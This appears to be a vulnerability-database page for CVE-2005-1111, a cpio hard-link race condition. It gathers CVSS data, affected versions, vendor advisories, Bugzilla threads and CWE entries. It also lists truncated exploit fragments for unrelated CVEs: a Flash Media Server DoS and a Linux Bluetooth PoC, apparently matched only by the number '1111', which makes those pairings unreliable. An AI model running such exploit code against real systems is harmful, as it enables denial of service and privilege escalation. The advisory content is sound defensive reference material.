CVE-2005-1111
published 2005-05-02CVE-2005-1111: Race condition in cpio 2.6 and earlier allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being…
PriorityP414medium4.7CVSS 3.1
AVLACHPRLUINSUCNIHAN
EPSS
0.31%
23.2th percentile
Race condition in cpio 2.6 and earlier allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by cpio after the decompression is complete.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | cpio | < cpio 2.6-6 (bookworm) | cpio 2.6-6 (bookworm) |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| gnu | cpio | <= 2.6 | — |
| gnu | cpio | >= 0 < 2.6-6 | 2.6-6 |
| gnu | cpio | >= 0 < 2.6-6 | 2.6-6 |
| gnu | cpio | >= 0 < 2.6-6 | 2.6-6 |
| gnu | cpio | >= 0 < 2.6-6 | 2.6-6 |
CVSS provenance
nvdv3.14.7MEDIUMCVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N
nvdv2.03.7LOWAV:L/AC:H/Au:N/C:P/I:P/A:P
osv4.7MEDIUM
vendor_debian4.7LOW
vendor_redhat4.7MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
BSD
FreeBSD-SA-06:03.cpio: Multiple vulnerabilities cpio
bsd_advisories·2006-01-11·CVSS 4.7
CVE-2005-1111 [MEDIUM] FreeBSD-SA-06:03.cpio: Multiple vulnerabilities cpio
FreeBSD-SA-06:03.cpio Security Advisory
The FreeBSD Project
Topic: Multiple vulnerabilities cpio
Category: contrib
Module: contrib_cpio
Announced: 2006-01-11
Credits: Imran Ghory, Richard Harms
Affects: All FreeBSD releases.
Corrected: 2006-01-11 08:02:16 UTC (RELENG_6, 6.0-STABLE)
2006-01-11 08:03:18 UTC (RELENG_6_0, 6.0-RELEASE-p2)
2006-01-11 08:03:55 UTC (RELENG_5, 5.4-STABLE)
2006-01-11 08:04:33 UTC (RELENG_5_4, 5.4-RELEASE-p9)
2006-01-11 08:05:54 UTC (RELENG_5_3, 5.3-RELEASE-p24)
2006-01-11 08:06:47 UTC (RELENG_4, 4.11-STABLE)
2006-01-11 08:07:18 UTC (RELENG_4_11, 4.11-RELEASE-p14)
2006-01-11 08:08:08 UTC (RELENG_4_10, 4.10-RELEASE-p20)
CVE Name: CVE-2005-1111, CVE-2005-1229, CVE-2005-4268
For general information regarding FreeBSD Security Advisories,
including descriptions of the
Ubuntu
cpio vulnerabilities
vendor_ubuntu·2005-09-29
CVE-2005-1111 cpio vulnerabilities
Title: cpio vulnerabilities
Summary: cpio vulnerabilities
Imran Ghory found a race condition in the handling of output files.
While a file was unpacked with cpio, a local attacker with write
permissions to the target directory could exploit this to change the
permissions of arbitrary files of the cpio user. (CAN-2005-1111)
Imran Ghory discovered a path traversal vulnerability. Even when the
--no-absolute-filenames option was specified, cpio did not filter out
".." path components. By tricking an user into unpacking a malicious
cpio archive, this could be exploited to install files in arbitrary
paths with the privileges of the user calling cpio. (CAN-2005-1229)
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
security flaw
vendor_redhat·2005-04-13·CVSS 4.7
CVE-2005-1111 [MEDIUM] security flaw
security flaw
Race condition in cpio 2.6 and earlier allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by cpio after the decompression is complete.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Debian
CVE-2005-1111: cpio - Race condition in cpio 2.6 and earlier allows local users to modify permissions ...
vendor_debian·2005·CVSS 4.7
CVE-2005-1111 [MEDIUM] CVE-2005-1111: cpio - Race condition in cpio 2.6 and earlier allows local users to modify permissions ...
Race condition in cpio 2.6 and earlier allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by cpio after the decompression is complete.
Scope: local
bookworm: resolved (fixed in 2.6-6)
bullseye: resolved (fixed in 2.6-6)
forky: resolved (fixed in 2.6-6)
sid: resolved (fixed in 2.6-6)
trixie: resolved (fixed in 2.6-6)
GHSA
GHSA-fg93-983g-7p2v: Race condition in cpio 2
ghsa_unreviewed·2022-05-03
CVE-2005-1111 [LOW] GHSA-fg93-983g-7p2v: Race condition in cpio 2
Race condition in cpio 2.6 and earlier allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by cpio after the decompression is complete.
OSV
CVE-2005-1111: Race condition in cpio 2
osv·2005-05-02·CVSS 4.7
CVE-2005-1111 [MEDIUM] CVE-2005-1111: Race condition in cpio 2
Race condition in cpio 2.6 and earlier allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by cpio after the decompression is complete.
No detection rules found.
Exploit-DB
Macromedia Flash Media Server 2 - Remote Denial of Service
exploitdb·2005-12-14
CVE-2005-4216 Macromedia Flash Media Server 2 - Remote Denial of Service
Macromedia Flash Media Server 2 - Remote Denial of Service
---
/*****************************************************************
Macromedia Flash Media Server 2 Remote D.o.S Exploit by Kozan
Application: Macromedia Flash Media Server
http://www.macromedia.com/software/flashmediaserver/
Vendor: Macromedia
Discovered by: dr_insane
Exploit Coded by: Kozan
Credits to ATmaCA, dr_insane
Web: www.spyinstructors.com
Mail: [email protected]
*****************************************************************/
#include
#include
#include
#pragma comment(lib,"ws2_32.lib")
int nDefaultPort = 1111;
char SingleDoSChar[] = "\x41";
int main(int argc, char *argv[])
{
fprintf(stdout, "\n\nMacromedia Flash Media Server 2 Remote D.o.S Exploit by Kozan\n");
fprintf(stdout, "Bug Discovered by: dr
Exploit-DB
Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC)
exploitdb·2005-03-28
CVE-2005-0750 Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC)
Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC)
---
/*
EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/
source: https://www.securityfocus.com/bid/12911/info
A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes.
A local attacker may leverage this issue to gain escalated privileges on an affected computer.
*/
#include
#include
#include
#include
main()
{
int ctl;
/* Open HCI socket */
if ((ctl = socket(AF_BLUETOOTH, SOCK_RAW, -1111)) < 0)
{
perror("Can't open HCI socket.");
exit(1);
}
}
Bugzilla
CVE-2005-1111 security flaw
bugzilla·2018-08-16·CVSS 4.7
CVE-2005-1111 [MEDIUM] CVE-2005-1111 security flaw
CVE-2005-1111 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Race condition in cpio 2.6 and earlier allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by cpio after the decompression is complete.
---
Statement:
Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Bugzilla
CVE-2005-1111 Race condition in cpio
bugzilla·2005-10-03·CVSS 4.7
CVE-2005-1111 [MEDIUM] CVE-2005-1111 Race condition in cpio
CVE-2005-1111 Race condition in cpio
Created attachment 119899
fix candidate
Discussion:
This issue is going to be RHSA-2005:806
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2005-806.html
Bugzilla
CVE-2005-1111 Race condition in cpio
bugzilla·2005-04-22·CVSS 4.7
CVE-2005-1111 [MEDIUM] CVE-2005-1111 Race condition in cpio
CVE-2005-1111 Race condition in cpio
Race condition in cpio 2.6 and earlier allows local users to modify permissions
of arbitrary files via a hard link attack on a file while it is being
decompressed, whose permissions are changed by cpio after the decompression is
complete.
http://marc.theaimsgroup.com/?l=bugtraq&m=111342664116120&w=2
Discussion:
This issue should also affect RHEL2.1 and RHEL3.
---
Created attachment 113839
Proposed patch from Steve Grubb
---
Created attachment 116230
I suggest to use this patch.
Steve's patch doesn't solve race condition on directories. My fix use mode 0700
for dir creation, which close some more holes.
---
We have not released an update for this issue on RHEL2.1 yet. RHEL3 and RHEL4
were fixed in RHSA-2005:378
---
The RHEL 2.1 bug in being
CWE
Improper Link Resolution Before File Access ('Link Following')
mitre_cwe
CWE-59 Improper Link Resolution Before File Access ('Link Following')
CWE-59: Improper Link Resolution Before File Access ('Link Following')
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
Background: Soft links are a UNIX term that is synonymous with simple shortcuts on Windows-based platforms.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Confidentiality, Integrity, Access Control. Impact: Read Files or Directories, Modify Files or Directories, Bypass Protection Mechanism. An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpe
CWE
UNIX Hard Link
mitre_cwe·CVSS 5.5
[MEDIUM] CWE-62 UNIX Hard Link
CWE-62: UNIX Hard Link
The product, when opening a file or directory, does not sufficiently account for when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.
Failure for a system to check for hard links can result in vulnerability to different types of attacks. For example, an attacker can escalate their privileges if a file used by a privileged program is replaced with a hard link to a sensitive file (e.g. /etc/passwd). When the process opens the file, the attacker can assume the privileges of that process.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Confidentiality, Integrity. Impact: Read Files or Directories, Modify File
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:03.cpio.ascftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.2/SCOSA-2006.2.txtftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.32/SCOSA-2005.32.txthttp://lists.suse.com/archive/suse-security-announce/2006-May/0004.htmlhttp://marc.info/?l=bugtraq&m=111342664116120&w=2http://secunia.com/advisories/16998http://secunia.com/advisories/17123http://secunia.com/advisories/17532http://secunia.com/advisories/18290http://secunia.com/advisories/18395http://secunia.com/advisories/20117http://www.debian.org/security/2005/dsa-846http://www.osvdb.org/15725http://www.redhat.com/support/errata/RHSA-2005-378.htmlhttp://www.redhat.com/support/errata/RHSA-2005-806.htmlhttp://www.securityfocus.com/bid/13159http://www.ubuntu.com/usn/usn-189-1https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A358https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9783ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:03.cpio.ascftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.2/SCOSA-2006.2.txtftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.32/SCOSA-2005.32.txthttp://lists.suse.com/archive/suse-security-announce/2006-May/0004.htmlhttp://marc.info/?l=bugtraq&m=111342664116120&w=2http://secunia.com/advisories/16998http://secunia.com/advisories/17123http://secunia.com/advisories/17532http://secunia.com/advisories/18290http://secunia.com/advisories/18395http://secunia.com/advisories/20117http://www.debian.org/security/2005/dsa-846http://www.osvdb.org/15725http://www.redhat.com/support/errata/RHSA-2005-378.htmlhttp://www.redhat.com/support/errata/RHSA-2005-806.htmlhttp://www.securityfocus.com/bid/13159http://www.ubuntu.com/usn/usn-189-1https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A358https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9783
2005-05-02
Published